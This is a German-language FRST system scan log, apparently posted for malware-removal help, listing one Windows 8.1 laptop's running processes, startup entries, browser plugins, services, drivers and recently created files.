  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz
Prozentuale Nutzung des RAM: 41%
Installierter physikalischer RAM: 4014.84 MB
Verf黦barer physikalischer RAM: 2366.58 MB
Summe virtueller Speicher: 4718.84 MB
Verf黦barer virtueller Speicher: 3155.92 MB

==================== Laufwerke ================================

Drive c: (NexusLap) (Fixed) (Total:869.8 GB) (Free:768.44 GB) NTFS
Drive d: (Recover) (Fixed) (Total:60 GB) (Free:42.31 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: B8E472D2)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

FRST Logfile:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-06-2017
durchgef黨rt von Nick Schuster (Administrator) auf RAZERLAP (07-06-2017 11:10:44)
Gestartet von C:\Users\Nick Schuster\Desktop\anti trojan\killer.exe
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Platform: Windows 8.1 (Update) (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: IE)
Start-Modus: Normal
Anleitung f黵 Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [AirServer64] => C:\Program Files\App Dynamic\AirServer\AirServer.exe
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [Dropbox] => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (CANON INC.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2017-06-05]

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zur點kgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 192.168.0.2
Tcpip\..\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [DhcpNameServer] 192.168.0.1 192.168.0.2
Tcpip\..\Interfaces\{bbed3e08-0b41-11e3-8249-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{D14F6D89-FA6F-4917-80C9-3F09BF6A6D5D}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [NameServer] 8.8.8.8
ManualProxies: 

Internet Explorer:
==================
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/?hl=de&gl=de
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab

FireFox:
========
FF DefaultProfile: ajsmomju.default
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default [2017-06-07]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-09] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-3847841184-804715454-2304624315-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Keine Datei]

Chrome: 
=======
CHR Profile: C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Default [2017-06-07]
CHR Extension: (Docs) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-06-07]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S4 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [365048 2016-10-07] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [387144 2016-02-04] ()
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10888944 2017-04-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S4 KingoSoftService; C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe "C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\checkupdate.exe"

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 DFX11_1; C:\Windows\system32\drivers\dfx11_1x64.sys [28008 2015-08-31] (Windows (R) Win 7 DDK provider)
S3 DFX12; C:\Windows\system32\drivers\dfx12x64.sys [29688 2015-11-12] (Windows (R) Win 7 DDK provider)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-07] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-07] (Disc Soft Ltd)
S3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30264 2017-05-25] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-05-31] ()
R3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [35832 2014-06-03] (Intel Corporation)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188312 2017-06-05] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-06-07] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [44960 2017-06-07] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [252832 2017-06-07] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [93600 2017-06-07] (Malwarebytes)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3526400 2017-03-09] (Intel Corporation)
S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [425216 2016-05-25] (Realsil Semiconductor Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [394296 2017-05-07] (Duplex Secure Ltd.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [51712 2011-02-18] (Apple, Inc.) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
S3 dbx; system32\DRIVERS\dbx.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Drei Monate: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-07 10:58 - 2017-06-07 10:58 - 00035011 _____ C:\Users\Nick Schuster\Desktop\SearchReg.txt
2017-06-07 10:46 - 2017-06-07 10:43 - 00028320 _____ C:\Users\Nick Schuster\Desktop\Fixlog.txt
2017-06-07 10:41 - 2017-06-07 10:41 - 00002287 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-06-05 17:30 - 2017-06-05 17:30 - 00000000 ____D C:\Users\Nick Schuster\Desktop\anti trojan
2017-06-05 15:57 - 2017-06-07 10:59 - 00093600 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-06-05 15:57 - 2017-06-07 10:45 - 00252832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-06-05 15:57 - 2017-06-07 10:45 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-06-05 15:57 - 2017-06-07 10:45 - 00044960 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-06-05 15:57 - 2017-06-05 15:57 - 00188312 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-06-05 15:57 - 2017-06-05 15:57 - 00001891 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-06-05 15:57 - 2017-06-05 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-06-05 15:57 - 2017-06-05 15:57 - 00000000 ____D C:\Program Files\Malwarebytes
2017-06-05 15:57 - 2017-05-31 11:09 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-06-05 15:48 - 2017-06-05 15:51 - 00000000 ____D C:\AdwCleaner
2017-06-05 15:40 - 2017-06-05 15:40 - 00000008 __RSH C:\ProgramData\ntuser.pol
2017-06-03 18:29 - 2017-06-03 18:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Wargaming.net
2017-06-03 17:56 - 2017-06-03 19:08 - 00000000 ____D C:\Games
2017-06-03 14:01 - 2017-06-07 11:10 - 00000000 ____D C:\FRST
2017-05-30 19:32 - 2017-06-07 10:34 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Google
2017-05-30 19:23 - 2017-06-07 10:35 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-05-30 19:23 - 2017-05-31 13:53 - 00002020 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-26 18:05 - 2017-05-26 18:05 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-05-26 17:40 - 2017-05-26 17:40 - 00000295 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Papierkorb.lnk
2017-05-25 15:34 - 2017-05-25 15:36 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Pro
2017-05-25 15:34 - 2017-05-25 15:34 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtproscsibus.sys
2017-05-25 15:33 - 2017-05-25 15:33 - 00000000 ____D C:\ProgramData\DAEMON Tools Pro
2017-05-23 15:44 - 2017-04-27 15:11 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-23 15:44 - 2017-04-27 15:10 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:11 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:10 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-23 15:42 - 2017-04-06 19:37 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-23 15:42 - 2017-04-06 19:16 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2017-05-23 15:42 - 2017-04-06 18:50 - 01436672 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00434688 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-23 15:42 - 2017-04-06 18:35 - 01362432 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2017-05-23 15:42 - 2017-04-06 18:15 - 00358912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-23 15:42 - 2017-04-06 17:44 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2017-05-23 15:42 - 2017-04-02 16:49 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2017-05-23 15:42 - 2017-04-02 15:40 - 02013016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-22 21:24 - 2017-05-22 21:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-18 22:17 - 2017-05-18 22:17 - 01499368 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00716880 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00166288 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2017-05-18 22:17 - 2017-05-18 22:17 - 00131984 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys
2017-05-11 14:18 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-11 14:18 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-11 14:18 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-11 14:18 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-11 14:18 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-11 14:18 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-11 14:18 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-11 14:18 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-11 14:18 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-11 14:18 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-11 14:18 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-11 14:18 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-11 14:18 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-11 14:18 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-11 14:18 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-11 14:18 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-11 14:18 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-11 14:18 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-11 14:18 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-11 14:18 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-11 14:18 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-11 14:18 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-11 14:18 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-11 14:18 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-11 14:18 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-11 14:18 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-11 14:18 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 16:11 - 2017-05-10 16:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\My Games
2017-05-07 15:12 - 2017-05-25 16:04 - 00000000 ____D C:\ProgramData\Orbit
2017-05-07 15:12 - 2017-05-07 15:12 - 00281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
